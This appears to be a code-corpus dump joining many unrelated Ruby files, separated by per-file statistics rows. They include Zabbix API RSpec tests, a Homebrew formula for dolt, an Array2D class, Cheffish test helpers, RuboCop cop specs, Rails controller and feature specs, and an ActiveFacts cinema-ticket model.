let(:templates_mock) { ZabbixApi::Templates.new(client) }
let(:client) { double }
describe '.method_name' do
subject { templates_mock.method_name }
it { is_expected.to eq 'template' }
end
describe '.identify' do
subject { templates_mock.identify }
it { is_expected.to eq 'host' }
end
describe '.delete' do
subject { templates_mock.delete(data) }
let(:data) { { testidentify: 222 } }
let(:result) { { 'templateids' => ['1'] } }
let(:identify) { 'testidentify' }
let(:method_name) { 'testmethod' }
before do
allow(templates_mock).to receive(:log)
allow(templates_mock).to receive(:identify).and_return(identify)
allow(templates_mock).to receive(:method_name).and_return(method_name)
allow(client).to receive(:api_request).with(
method: 'template.delete',
params: [data]
).and_return(result)
end
context 'when result is not empty' do
it 'returns the id of first template' do
expect(subject).to eq 1
end
end
context 'when result is empty' do
let(:result) { [] }
it { is_expected.to be_nil }
end
end
describe '.get_ids_by_host' do
subject { templates_mock.get_ids_by_host(data) }
let(:data) { { scriptid: 222, hostid: 333 } }
let(:result) { [{ 'templateid' => 1 }, { 'templateid' => 2 }] }
let(:ids) { [1, 2] }
before do
allow(client).to receive(:api_request).with(
method: 'template.get',
params: data
).and_return(result)
end
it { is_expected.to eq ids }
end
describe '.get_or_create' do
subject { templates_mock.get_or_create(data) }
let(:data) { { host: 1234 } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(templates_mock).to receive(:get_id).with(host: data[:host]).and_return(id)
allow(templates_mock).to receive(:create).with(data).and_return(id_through_create)
end
context 'when ID already exist' do
let(:id) { '111' }
it 'returns the existing ID' do
expect(subject).to eq id
end
end
context 'when id does not exist' do
it 'returns the newly created ID' do
expect(subject).to eq id_through_create
end
end
end
describe '.mass_update' do
subject { templates_mock.mass_update(data) }
let(:data) { { hosts_id: [1234, 5678], templates_id: [1111, 2222] } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(client).to receive(:api_request).with(
method: 'template.massUpdate',
params: {
hosts: [{ hostid: 1234 }, { hostid: 5678 }],
templates: [{ templateid: 1111 }, { templateid: 2222 }]
}
).and_return(result)
end
context 'when api_request returns empty result' do
let(:result) { [] }
it { is_expected.to be_falsy }
end
context 'when api_request does not return empty result' do
it { is_expected.to be_truthy }
end
end
describe '.mass_add' do
subject { templates_mock.mass_add(data) }
let(:data) { { hosts_id: [1234, 5678], templates_id: [1111, 2222] } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(client).to receive(:api_request).with(
method: 'template.massAdd',
params: {
hosts: [{ hostid: 1234 }, { hostid: 5678 }],
templates: [{ templateid: 1111 }, { templateid: 2222 }]
}
).and_return(result)
end
context 'when api_request returns empty result' do
let(:result) { [] }
it { is_expected.to be_falsy }
end
context 'when api_request does not return empty result' do
it { is_expected.to be_truthy }
end
end
describe '.mass_remove' do
subject { templates_mock.mass_remove(data) }
let(:data) { { hosts_id: [1234, 5678], templates_id: [1111, 2222], group_id: 4545 } }
let(:result) { [{ 'testkey' => '111', 'testidentify' => 1 }] }
let(:id) { nil }
let(:id_through_create) { 222 }
before do
allow(client).to receive(:api_request).with(
method: 'template.massRemove',
params: {
hostids: data[:hosts_id],
templateids: data[:templates_id],
groupids: data[:group_id],
force: 1
}
).and_return(result)
end
context 'when api_request returns empty result' do
let(:result) { [] }
it { is_expected.to be_falsy }
end
context 'when api_request does not return empty result' do
it { is_expected.to be_truthy }
end
end
end
| 26.391304 | 89 | 0.600906 |
ed0c47ec2b3fab2f1c9f4379faf99c9497a5bd2d | 235 | describe file('/boot/cmdline.txt') do
it { should be_file }
it { should be_mode 755 }
it { should be_owned_by 'root' }
its(:content) { should match /console=tty1/ }
its(:content) { should match /console=ttyAMA0,115200/ }
end
| 29.375 | 57 | 0.680851 |
ed8f34e52f223b43e0d4dcc7aefad768c378a3e1 | 44 | module Adyen
VERSION = '0.1.8'.freeze
end
| 11 | 26 | 0.681818 |
bfe08b02ad16c24d9bc69eb13e94bb64d8c9872e | 680 | # Copyright 2017, Google Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "google/cloud/video_intelligence/v1beta1/video_intelligence_service_client"
| 45.333333 | 83 | 0.780882 |
381649185a0ba39e2ecf9fece05d7f8e870d8830 | 3,156 | class Array2D
include Enumerable
attr_accessor :state
def initialize(rows, columns, value=nil)
@state = Array.new(rows) { Array.new(columns) { value } }
end
def each(&block)
@state.each do |row|
row.each do |e|
yield e
end
end
end
def each_with_index(&block)
@state.each_with_index do |row, row_index|
row.each_with_index do |e, column_index|
yield e, [row_index, column_index]
end
end
end
def to_s
@state.to_s
end
def ==(o)
o.class == self.class && o.state == state
end
def size
[row_size, column_size]
end
def row_size
@state.size
end
def column_size
@state[0].size
end
def [](x, y)
case x
when Integer
case y
when Integer
@state[x][y]
when Range
if y.size <= column_size
subarray = Array.new(y.to_a.size)
y.each {|yi| subarray[yi - y.first] = @state[x][yi]}
subarray
else
raise IndexError, "Indices are out of range"
end
end
when Range
case y
when Integer
if x.size <= row_size
subarray = Array.new(x.to_a.size)
x.each {|xi| subarray[xi - x.first] = @state[xi][y]}
subarray
else
raise IndexError, "Indices are out of range"
end
when Range
if x.size <= row_size && y.size <= column_size
subarray = Array2D.new(x.to_a.size, y.to_a.size)
x.each do |xi|
y.each do |yi|
subarray.state[xi - x.first][yi - y.first] = @state[xi][yi]
end
end
subarray
else
raise IndexError, "Indices are out of range"
end
end
end
end
def []=(x, y, value)
case x
when Integer
case y
when Integer
@state[x][y] = value
when Range
if value.is_a?(Array) && y.size == value.size
y.each {|yi| @state[x][yi] = value[yi - y.first]}
elsif value.is_a?(Array) && y.size != value.size
raise AssignmentError, "Value array is not the same size as subarray"
else
y.each {|yi| @state[x][yi] = value}
end
end
when Range
case y
when Integer
if value.is_a?(Array) && x.size == value.size
x.each {|xi| @state[xi][y] = value[xi - x.first]}
elsif value.is_a?(Array) && x.size != value.size
raise AssignmentError, "Value array is not the same size as subarray"
else
x.each {|xi| @state[xi][y] = value}
end
when Range
x.each do |xi|
y.each do |yi|
if value.is_a?(Array2D) && [x.size, y.size] == value.size
@state[xi][yi] = value[xi - x.first, yi - y.first]
elsif value.is_a?(Array2D) && [x.size, y.size] != value.size
raise AssignmentError, "Value 2d array is not the same size as subarray"
else
@state[xi][yi] = value
end
end
end
end
end
end
end
# Raised for out-of-range index access.  NOTE(review): this reopens Ruby's
# built-in IndexError (its superclass is already StandardError), so it is
# effectively the core exception class.
class IndexError < StandardError; end
# Raised when a bulk assignment's value does not match the target window size.
class AssignmentError < StandardError; end
1cda566e8d998bdbb0d09a31886ba7386d46c1e9 | 95 | Rails.application.routes.draw do
mount ViewComponentKit::Engine => "/view_component_kit"
end
| 23.75 | 57 | 0.8 |
1ab0e1f387c7f691c5a2264a5bbec7c9a49003d4 | 3,136 | module Cheffish
module RSpec
module RepositorySupport
def when_the_repository(desc, *tags, &block)
context("when the chef repo #{desc}", *tags) do
include_context "with a chef repo"
extend WhenTheRepositoryClassMethods
module_eval(&block)
end
end
::RSpec.shared_context "with a chef repo" do
before :each do
raise "Can only create one directory per test" if @repository_dir
@repository_dir = Dir.mktmpdir("chef_repo")
Chef::Config.chef_repo_path = @repository_dir
%w{client cookbook data_bag environment node role user}.each do |object_name|
Chef::Config.delete("#{object_name}_path".to_sym)
end
end
after :each do
if @repository_dir
begin
%w{client cookbook data_bag environment node role user}.each do |object_name|
Chef::Config.delete("#{object_name}_path".to_sym)
end
Chef::Config.delete(:chef_repo_path)
FileUtils.remove_entry_secure(@repository_dir)
ensure
@repository_dir = nil
end
end
Dir.chdir(@old_cwd) if @old_cwd
end
def directory(relative_path, &block)
old_parent_path = @parent_path
@parent_path = path_to(relative_path)
FileUtils.mkdir_p(@parent_path)
instance_eval(&block) if block
@parent_path = old_parent_path
end
def file(relative_path, contents)
filename = path_to(relative_path)
dir = File.dirname(filename)
FileUtils.mkdir_p(dir) unless dir == "."
File.open(filename, "w") do |file|
raw = case contents
when Hash, Array
JSON.pretty_generate(contents)
else
contents
end
file.write(raw)
end
end
def symlink(relative_path, relative_dest)
filename = path_to(relative_path)
dir = File.dirname(filename)
FileUtils.mkdir_p(dir) unless dir == "."
dest_filename = path_to(relative_dest)
File.symlink(dest_filename, filename)
end
def path_to(relative_path)
File.expand_path(relative_path, (@parent_path || @repository_dir))
end
def cwd(relative_path)
@old_cwd = Dir.pwd
Dir.chdir(path_to(relative_path))
end
module WhenTheRepositoryClassMethods
def directory(*args, &block)
before :each do
directory(*args, &block)
end
end
def file(*args, &block)
before :each do
file(*args, &block)
end
end
def symlink(*args, &block)
before :each do
symlink(*args, &block)
end
end
def path_to(*args, &block)
before :each do
file(*args, &block)
end
end
end
end
end
end
end
| 29.037037 | 91 | 0.544643 |
bbb9f52eb7931576ffa22473690d36e7f0448516 | 5,599 | # frozen_string_literal: true
RSpec.describe RuboCop::Cop::Rails::ContentTag, :config do
context 'Rails 5.0', :rails50 do
it 'does not register an offense' do
expect_no_offenses(<<~RUBY)
content_tag(:p, 'Hello world!')
RUBY
end
it 'does not register an offense with empty tag' do
expect_no_offenses(<<~RUBY)
content_tag(:br)
RUBY
end
it 'does not register an offense with array of classnames' do
expect_no_offenses(<<~RUBY)
content_tag(:div, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offense with nested content_tag' do
expect_no_offenses(<<~RUBY)
content_tag(:div) { content_tag(:strong, 'Hi') }
RUBY
end
end
context 'Rails 5.1', :rails51 do
it 'corrects an offence' do
expect_offense(<<~RUBY)
content_tag(:p, 'Hello world!')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.p('Hello world!')
RUBY
end
it 'corrects an offence with empty tag' do
expect_offense(<<~RUBY)
content_tag(:br)
^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.br()
RUBY
end
it 'corrects an offence with array of classnames' do
expect_offense(<<~RUBY)
content_tag(:div, "Hello world!", class: ["strong", "highlight"])
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.div("Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'corrects an offence with nested content_tag' do
expect_offense(<<~RUBY)
content_tag(:div) { content_tag(:strong, 'Hi') }
^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.div() { tag.strong('Hi') }
RUBY
end
it 'corrects an offence when first argument is hash' do
expect_offense(<<~RUBY)
content_tag({foo: 1})
^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag({foo: 1})
RUBY
end
it 'corrects an offence when first argument is non-identifier string' do
expect_offense(<<~RUBY)
content_tag('foo-bar', 'baz', class: 'strong')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
RUBY
expect_correction(<<~RUBY)
tag.foo_bar('baz', class: 'strong')
RUBY
end
it 'corrects an offense when called with options hash and block' do
expect_offense(<<~RUBY)
content_tag :div, { class: 'strong' } do
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use `tag` instead of `content_tag`.
'body'
end
RUBY
expect_correction(<<~RUBY)
tag.div({ class: 'strong' }) do
'body'
end
RUBY
end
it 'does not register an offence when `tag` is used with an argument' do
expect_no_offenses(<<~RUBY)
tag.p('Hello world!')
RUBY
end
it 'does not register an offence when `tag` is used without arguments' do
expect_no_offenses(<<~RUBY)
tag.br
RUBY
end
it 'does not register an offence when `tag` is used with arguments' do
expect_no_offenses(<<~RUBY)
tag.div("Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when `tag` is nested' do
expect_no_offenses(<<~RUBY)
tag.div() { tag.strong('Hi') }
RUBY
end
it 'does not register an offense when `content_tag` is called with no arguments' do
expect_no_offenses(<<~RUBY)
content_tag
RUBY
end
context 'when the first argument is a variable' do
it 'does not register an offence when the first argument is a lvar' do
expect_no_offenses(<<~RUBY)
name = do_something
content_tag(name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is an ivar' do
expect_no_offenses(<<~RUBY)
content_tag(@name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is a cvar' do
expect_no_offenses(<<~RUBY)
content_tag(@@name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is a gvar' do
expect_no_offenses(<<~RUBY)
content_tag($name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
it 'does not register an offence when the first argument is a splat argument' do
expect_no_offenses(<<~RUBY)
content_tag(*args, &block)
RUBY
end
end
context 'when the first argument is a method' do
it 'does not register an offence' do
expect_no_offenses(<<~RUBY)
content_tag(name, "Hello world!", class: ["strong", "highlight"])
RUBY
end
end
context 'when the first argument is a constant' do
it 'does not register an offence' do
expect_no_offenses(<<~RUBY)
content_tag(CONST, "Hello world!", class: ["strong", "highlight"])
RUBY
end
end
end
end
| 29.010363 | 109 | 0.567066 |
e211481baa947bbc543c50d3f8a6344c023865c1 | 1,908 | module Api
  # REST endpoints for cloud-volume CRUD; all provider work is queued as
  # asynchronous tasks and surfaced to the API caller via task ids.
  class CloudVolumesController < BaseController
    include Subcollections::Tags
    # Queue creation of a volume on the provider identified by data['ems_id'].
    def create_resource(_type, _id = nil, data = {})
      ext_management_system = ExtManagementSystem.find(data['ems_id'])
      # Provider-specific CloudVolume subclass decides whether :create is supported.
      klass = CloudVolume.class_by_ems(ext_management_system)
      raise BadRequestError, klass.unsupported_reason(:create) unless klass.supports?(:create)
      task_id = klass.create_volume_queue(session[:userid], ext_management_system, data)
      action_result(true, "Creating Cloud Volume #{data['name']} for Provider: #{ext_management_system.name}", :task_id => task_id)
    rescue => err
      # Any lookup/queueing failure is reported as a failed action result.
      action_result(false, err.to_s)
    end
    # Queue an update of an existing volume.
    def edit_resource(type, id, data = {})
      raise BadRequestError, "Must specify an id for editing a #{type} resource" unless id
      cloud_volume = resource_search(id, type, collection_class(:cloud_volumes))
      raise BadRequestError, cloud_volume.unsupported_reason(:update) unless cloud_volume.supports?(:update)
      task_id = cloud_volume.update_volume_queue(User.current_user, data)
      action_result(true, "Updating #{cloud_volume.name}", :task_id => task_id)
    rescue => err
      action_result(false, err.to_s)
    end
    # Queue a provider-side "safe delete" (only valid when supported).
    def safe_delete_resource(type, id, _data = {})
      api_resource(type, id, "Deleting") do |cloud_volume|
        ensure_supports(type, cloud_volume, :safe_delete)
        {:task_id => cloud_volume.safe_delete_volume_queue(User.current_userid)}
      end
    end
    # Queue an unconditional delete of the volume.
    def delete_resource_main_action(_type, cloud_volume, _data)
      # TODO: ensure_supports(type, cloud_volume, :delete)
      {:task_id => cloud_volume.delete_volume_queue(User.current_userid)}
    end
    # OPTIONS: form options scoped to a volume (id) or a provider (ems_id),
    # falling back to the generic collection options.
    def options
      if (id = params["id"])
        render_update_resource_options(id)
      elsif (ems_id = params["ems_id"])
        render_create_resource_options(ems_id)
      else
        super
      end
    end
  end
| 36 | 131 | 0.705451 |
5d46778d96c148c46fcc72deda7bf3efed05bae0 | 1,418 | class Dolt < Formula
desc "Git for Data"
homepage "https://github.com/liquidata-inc/dolt"
url "https://github.com/dolthub/dolt/archive/v0.22.8.tar.gz"
sha256 "baf41ca21fd2f7ab239ca27245a5e22152206db6e141cbf2329624199556f4fd"
license "Apache-2.0"
livecheck do
url :stable
strategy :github_latest
end
bottle do
cellar :any_skip_relocation
sha256 "bbd6ba6959b8d58d9ed958a66d9ebe02f6a1991fea9b354344ca215cce0bba02" => :big_sur
sha256 "1763b29a40f623a2ce9f100075121f42a4f63fa5f65108f0ac59389853170907" => :arm64_big_sur
sha256 "ae300ba99d43583e99ffbdb3bb0a5ae52da1017d16626f353807fdb340e9de71" => :catalina
sha256 "fc4b0864a5142a8ebd91c1b4ae3195df5a1360b27d0ba939feb12a03d2286f0e" => :mojave
end
depends_on "go" => :build
def install
chdir "go" do
system "go", "build", *std_go_args, "./cmd/dolt"
system "go", "build", *std_go_args, "-o", bin/"git-dolt", "./cmd/git-dolt"
system "go", "build", *std_go_args, "-o", bin/"git-dolt-smudge", "./cmd/git-dolt-smudge"
end
end
test do
ENV["DOLT_ROOT_PATH"] = testpath
mkdir "state-populations" do
system bin/"dolt", "init", "--name", "test", "--email", "test"
system bin/"dolt", "sql", "-q", "create table state_populations ( state varchar(14), primary key (state) )"
assert_match "state_populations", shell_output("#{bin}/dolt sql -q 'show tables'")
end
end
end
| 34.585366 | 113 | 0.705219 |
089a8b784b2ce7bdff0d0bbc2244183ec76411e2 | 39 | class TagDecorator < DecoratorBase
end
| 13 | 34 | 0.846154 |
21ecb8a8598b6017c9d4868bb80c4acfbc92fff9 | 1,115 | #!/usr/bin/env ruby
require 'facets'
require 'andand'
require 'commander'
require 'colorize'
require 'terminal-table'
require 'chronic_duration'
require_relative './ext'
# Thin DSL around Commander: subcommand files register commands/aliases on
# the App class, and #run replays those registrations into Commander.
class App
  include Commander::Methods
  # Namespace reserved for command implementations mixed in by the required
  # command files (./ps, ./inspect, ...).
  module Commands
  end
  # Default indentation (in spaces) for nested console output.
  INDENT = 2
  class << self
    # Register a named command whose body is +block+.
    def command(name, &block)
      @commands ||= []
      @commands << {
        name: name,
        type: :command,
        block: block,
      }
    end
    # Register an alias; +args+ are forwarded to Commander's alias_command.
    def alias_command(name, *args)
      # FIX: was `@commands ||= {}` — a Hash has no #<<, so registering an
      # alias before any command crashed; the registry is an Array.
      @commands ||= []
      @commands << {
        name: name,
        type: :alias,
        args: args,
      }
    end
    # All registrations in declaration order (empty Array when none —
    # FIX: previously fell back to a Hash, which #run cannot iterate).
    def commands
      return @commands || []
    end
  end
  def run
    program :name, 'docker-tools'
    program :version, '0.0.1'
    program :description, 'Docker tools'
    self.class.commands.each do |info|
      case info[:type]
      when :command
        command info[:name] do |*args|
          instance_exec(*args, &info[:block])
        end
      when :alias
        alias_command(info[:name], *info[:args])
      else
        # FIX: `throw` without a matching `catch` raises UncaughtThrowError;
        # an unknown registration type is a programming error, so raise.
        raise "Unsupported command type #{info[:type]} for command #{info[:name]}"
      end
    end
    run!
  end
end
require_relative './ps'
require_relative './inspect'
# Only self-execute when run directly as a script (not when required).
App.new.run if $0 == __FILE__
| 16.15942 | 77 | 0.632287 |
038406b578c963ad781e6e06ced05fba6d71c8ff | 497 | # frozen_string_literal: true
module Mj
module AlternativeFile
class Resolver
def initialize
@stack = []
end
def add(resolver)
@stack.push(resolver)
end
def resolve(file)
file = AlternativeFile::CurrentFile.new(file.to_s)
resolved = []
@stack.each do |resolver|
resolved.push(resolver.resolve(file))
end
AlternativeFile::Candidates.new(resolved.flatten.compact)
end
end
end
end
| 18.407407 | 65 | 0.603622 |
797879d077ec008988e91dcfac9e125bec486b24 | 202 | # frozen_string_literal: true
# Todo item model (isomorphic ActiveRecord-style DSL).
class Todo < ActiveRecord::Model
  # Presumably declares the columns with their defaults: an untitled,
  # not-yet-completed item — confirm against the framework's `attributes` API.
  attributes title: '', completed: false
  scope(:completed) { where(completed: true) }
  scope(:active) { where(completed: false) }
end
| 22.444444 | 46 | 0.717822 |
4abdbcb939c0e985c302d5c8262909f990f52fbc | 1,691 | class KSTable
include DRbUndumped
attr_accessor :row, :context, :rollback_buffer, :rollback_hash
def pending_deletion?
@deletion
end
def read_only?
@read_only
end
alias :read_only :read_only?
def read_only=(cond)
@read_only = cond ? true : false
end
def serialized?
@serialized
end
def set_pending_deletion
@deletion = true
end
def reset_pending_deletion
@deletion = false
end
def set_serialized
@serialized = true
end
def initialize
@row = {}
@rollback_buffer = []
@rollback_hash = {}
@serialized = false
@pending_deletion = false
@read_only = false
end
def load(row, context = nil, read_only = false)
@row, @context, @read_only = row, context, read_only
self
end
def key
result = self.class.primaries.collect{|f| @row[f.to_s]}
end
def changed
@context.changed(self) if defined?(@context) && @context
end
def table_name
self.class.table_name
end
def inspect
table_name + @row.inspect
end
def delete # TODO: Add a cascade_delete that deletes the row plus any to_many relations to the row.
if @context.autocommit?
@context.delete_one(self)
else
set_pending_deletion
changed
nullify_self
end
end
def nullify_self
@rollback_buffer.push self.dup
@row.each_key do |key|
@rollback_hash[key] ||= []
@rollback_hash[key].push @row[key]
end
@row = {}
end
# Unwind the changes.
def rollback
@rollback_buffer.reverse.each do |rbval|
if Array === rbval
@row[rbval[0]] = rbval[1]
else
@row = rbval.row
reset_pending_deletion
end
end
@rollback_buffer.clear
@rollback_hash.each_key do |key|
@rollback_hash[key].clear
end
end
end
| 16.417476 | 100 | 0.690124 |
1aeae5174af05be7abf35dd90d0dc486e6fe16ee | 7,844 | # frozen_string_literal: true
RSpec.feature "ColocatedTask", :all_dbs do
let(:vlj_support_staff) { create(:user) }
before { Colocated.singleton.add_user(vlj_support_staff) }
describe "attorney assigns task to vlj support staff, vlj returns it to attorney after completion" do
let(:judge_user) { create(:user) }
let!(:vacols_judge) { create(:staff, :judge_role, sdomainid: judge_user.css_id) }
let(:attorney_user) { create(:user) }
let!(:vacols_atty) { create(:staff, :attorney_role, sdomainid: attorney_user.css_id) }
let(:root_task) { create(:root_task) }
let(:appeal) { root_task.appeal }
let!(:atty_task) do
create(
:ama_attorney_task,
appeal: appeal,
parent: root_task,
assigned_by: judge_user,
assigned_to: attorney_user
)
end
let(:return_instructions) { "These are the instructions from the VLJ" }
it "should return attorney task to active state" do
# Attorney assigns task to VLJ support staff.
User.authenticate!(user: attorney_user)
visit("/queue/appeals/#{appeal.uuid}")
find(".Select-control", text: "Select an action…").click
find("div", class: "Select-option", text: Constants.TASK_ACTIONS.ADD_ADMIN_ACTION.to_h[:label]).click
# Redirected to assign colocated action page
action = Constants.CO_LOCATED_ADMIN_ACTIONS.poa_clarification
find(".Select-control", text: "Select an action").click
find("div", class: "Select-option", text: action).click
fill_in(COPY::ADD_COLOCATED_TASK_INSTRUCTIONS_LABEL, with: "note")
find("button", text: COPY::ADD_COLOCATED_TASK_SUBMIT_BUTTON_LABEL).click
# Redirected to personal queue page. Assignment succeeds.
expect(page).to have_content("You have assigned an administrative action (#{action})")
# Visit case details page for VLJ support staff.
User.authenticate!(user: vlj_support_staff)
visit("/queue/appeals/#{appeal.uuid}")
# Return case to attorney.
find(".Select-control", text: "Select an action…").click
find("div", class: "Select-option", text: Constants.TASK_ACTIONS.COLOCATED_RETURN_TO_ATTORNEY.to_h[:label]).click
fill_in("instructions", with: return_instructions)
find("button", text: COPY::MARK_TASK_COMPLETE_BUTTON).click
# Redirected to personal queue page. Return to attorney succeeds.
expect(page).to have_content(
format(COPY::MARK_TASK_COMPLETE_CONFIRMATION, appeal.veteran.name.formatted(:readable_full))
)
# View attorney personal queue page. Should see appeal in assigned active queue.
User.authenticate!(user: attorney_user)
visit("/queue")
# Click into case details page.
click_on(appeal.veteran.name.formatted(:readable_full))
# verify that the instructions from the VLJ appear on the case timeline
expect(page).to have_css("h2", text: "Case Timeline")
scroll_to(find("h2", text: "Case Timeline"))
poa_task = PoaClarificationColocatedTask.find_by(assigned_to_type: User.name)
click_button(COPY::TASK_SNAPSHOT_VIEW_TASK_INSTRUCTIONS_LABEL, id: poa_task.id)
expect(page).to have_content(return_instructions)
# Expect to see draft decision option.
find(".Select-control", text: "Select an action…").click
expect(page).to have_content(Constants.TASK_ACTIONS.REVIEW_AMA_DECISION.to_h[:label])
# ColocatedTask assigned to organization should have status completed.
expect(atty_task.children.first.status).to eq(Constants.TASK_STATUSES.completed)
end
end
describe "vlj support staff places the task on hold" do
let(:root_task) { create(:root_task) }
let(:appeal) { root_task.appeal }
let(:veteran_name) { appeal.veteran.name.formatted(:readable_full) }
context "when ColocatedTask is in progress" do
let(:hold_duration_days) { 15 }
let!(:colocated_task) do
create(
:ama_colocated_task,
appeal: appeal,
parent: root_task
)
end
let(:individual_task) { colocated_task.children.first }
it "is successfully placed on hold" do
# Visit case details page for VLJ support staff.
User.authenticate!(user: vlj_support_staff)
visit("/queue/appeals/#{appeal.uuid}")
# Attempt to put the task on hold.
click_dropdown(text: Constants.TASK_ACTIONS.PLACE_TIMED_HOLD.label)
# Modal appears.
expect(page).to have_content(Constants.TASK_ACTIONS.PLACE_TIMED_HOLD.label)
# Attempt to place the task on hold without including notes.
find(".Select-control", text: COPY::COLOCATED_ACTION_PLACE_HOLD_LENGTH_SELECTOR_LABEL).click
find("div", class: "Select-option", text: "#{hold_duration_days} days").click
click_on(COPY::MODAL_SUBMIT_BUTTON)
# Instructions field is required
expect(page).to have_content(COPY::FORM_ERROR_FIELD_REQUIRED)
# Add instructions and try again
fill_in("instructions", with: "some text")
click_on(COPY::MODAL_SUBMIT_BUTTON)
# We should see a success message and remain on the case details page.
expect(page).to have_content(
format(COPY::COLOCATED_ACTION_PLACE_HOLD_CONFIRMATION, veteran_name, hold_duration_days)
)
expect(page).to have_current_path("/queue/appeals/#{appeal.uuid}")
# Task snapshot updated with new hold information
expect(page).to have_content("0 of #{hold_duration_days}")
end
end
end
describe "vlj support staff changes task type" do
let(:root_task) { create(:root_task) }
let(:appeal) { root_task.appeal }
let!(:colocated_task) do
create(
:ama_colocated_task,
:other,
appeal: appeal,
parent: root_task,
assigned_to: vlj_support_staff
)
end
let(:new_task_type) { IhpColocatedTask }
it "should update the task type" do
# Visit case details page for VLJ support staff.
User.authenticate!(user: vlj_support_staff)
visit "/queue"
click_on "#{appeal.veteran_full_name} (#{appeal.veteran_file_number})"
# Navigate to the change task type modal
find(".Select-control", text: COPY::TASK_ACTION_DROPDOWN_BOX_LABEL).click
find("div", class: "Select-option", text: Constants.TASK_ACTIONS.CHANGE_TASK_TYPE.to_h[:label]).click
expect(page).to have_content(COPY::CHANGE_TASK_TYPE_SUBHEAD)
# Ensure all admin actions are available
find(".Select-control", text: "Select an action type").click do
visible_options = page.find_all(".Select-option")
expect(visible_options.length).to eq Constants::CO_LOCATED_ADMIN_ACTIONS.length
end
# Attempt to change task type without including instuctions.
find("div", class: "Select-option", text: new_task_type.label).click
find("button", text: COPY::CHANGE_TASK_TYPE_SUBHEAD).click
# Instructions field is required
expect(page).to have_content(COPY::FORM_ERROR_FIELD_REQUIRED)
# Add instructions and try again
instructions = generate_words(5)
fill_in("instructions", with: instructions)
find("button", text: COPY::CHANGE_TASK_TYPE_SUBHEAD).click
# We should see a success message but remain on the case details page
expect(page).to have_content(
format(
COPY::CHANGE_TASK_TYPE_CONFIRMATION_TITLE,
Constants::CO_LOCATED_ADMIN_ACTIONS.values.last,
new_task_type.label
)
)
# Ensure the task has been updated
expect(page).to have_content(format("TASK\n%<label>s", label: new_task_type.label))
page.find("#currently-active-tasks button", text: COPY::TASK_SNAPSHOT_VIEW_TASK_INSTRUCTIONS_LABEL).click
expect(page).to have_content(instructions)
end
end
end
| 40.854167 | 119 | 0.692504 |
396a15a4e291fad41f00a8ac4092999d1e48a466 | 714 | module Fog
module Compute
class Google
class Mock
def add_url_map_path_matchers(url_map, path_matchers)
Fog::Mock.not_implemented
end
end
class Real
def add_url_map_path_matchers(url_map, path_matchers)
api_method = @compute.url_maps.update
parameters = {
'project' => @project,
'urlMap' => url_map.name
}
if url_map.pathMatchers then
url_map.pathMatchers.concat(path_matchers)
else
url_map.pathMatchers = path_matchers
end
request(api_method, parameters, body_object=url_map)
end
end
end
end
end
| 23.8 | 62 | 0.572829 |
b9e00ff7d626c5a4800d57ecbdee8026fb53a025 | 7,687 | require 'activefacts/api'
# Object-fact model for a cinema ticketing domain, declared with the
# activefacts-api DSL.  `value_type` classes are scalar domains; entity
# classes are identified by the roles named in `identified_by`.  The trailing
# comments on each role are generated fact readings.
module CinemaTickets
  class AddressText < Text
    value_type
  end
  class Address
    identified_by :address_text
    one_to_one :address_text, mandatory: true    # Address has Address Text, see AddressText#address
  end
  class CinemaID < AutoCounter
    value_type
  end
  class Name < String
    value_type
  end
  class Cinema
    identified_by :cinema_id
    one_to_one :cinema_id, mandatory: true, class: CinemaID  # Cinema has Cinema ID, see CinemaID#cinema_as_cinema_id
    one_to_one :name, mandatory: true           # Cinema has Name, see Name#cinema
  end
  class SectionName < String
    value_type
  end
  class Section
    identified_by :section_name
    one_to_one :section_name, mandatory: true   # Section has Section Name, see SectionName#section
  end
  class AllocatableCinemaSection
    identified_by :cinema, :section
    has_one :cinema, mandatory: true            # AllocatableCinemaSection involves Cinema, see Cinema#all_allocatable_cinema_section
    has_one :section, mandatory: true           # AllocatableCinemaSection involves Section, see Section#all_allocatable_cinema_section
  end
  class BookingNr < SignedInteger
    value_type length: 32
  end
  class CollectionCode < SignedInteger
    value_type length: 32
  end
  class Number < UnsignedInteger
    value_type length: 16
  end
  class EncryptedPassword < String
    value_type
  end
  class PersonID < AutoCounter
    value_type
  end
  class Person
    identified_by :person_id
    one_to_one :person_id, mandatory: true, class: PersonID  # Person has Person ID, see PersonID#person_as_person_id
    has_one :encrypted_password                 # Person has Encrypted Password, see EncryptedPassword#all_person
